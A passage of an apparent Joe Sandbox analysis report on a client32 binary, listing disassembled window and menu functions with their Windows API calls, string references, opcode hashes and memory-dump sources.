                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FindMessageSendWindow
                                                                                                                                                    • String ID: MSOfficeWClass
                                                                                                                                                    • API String ID: 1741975844-970895155
                                                                                                                                                    • Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                                                                                    • Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
                                                                                                                                                    • Opcode Fuzzy Hash: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                                                                                    • Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC
                                                                                                                                                    Function 1115F310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(?,000000A8,110AC717), ref: 1115F338
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
                                                                                                                                                    • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                                                                                    • API String ID: 1417657345-2201682149
                                                                                                                                                    • Opcode ID: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                                                                                    • Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
                                                                                                                                                    • Opcode Fuzzy Hash: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                                                                                    • Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681
                                                                                                                                                    Function 1101D390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenu.USER32(00000000), ref: 1101D3B4
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 1101D3A3
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 1590435379-2830328467
                                                                                                                                                    • Opcode ID: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                                                                                    • Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
                                                                                                                                                    • Opcode Fuzzy Hash: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                                                                                    • Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384
                                                                                                                                                    Function 1115B910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MenuProp
                                                                                                                                                    • String ID: OldMenu
                                                                                                                                                    • API String ID: 601939786-3235417843
                                                                                                                                                    • Opcode ID: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
                                                                                                                                                    • Instruction ID: 00d1d82ffe912eb1f0033c226aa13db8fbf5a9b0d38ca05e3ef3a03686f26a50
                                                                                                                                                    • Opcode Fuzzy Hash: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
                                                                                                                                                    • Instruction Fuzzy Hash: CBC0123214257DA782016A95DD44DCBFB6DEE0A1557044022F520D2401E721551047E9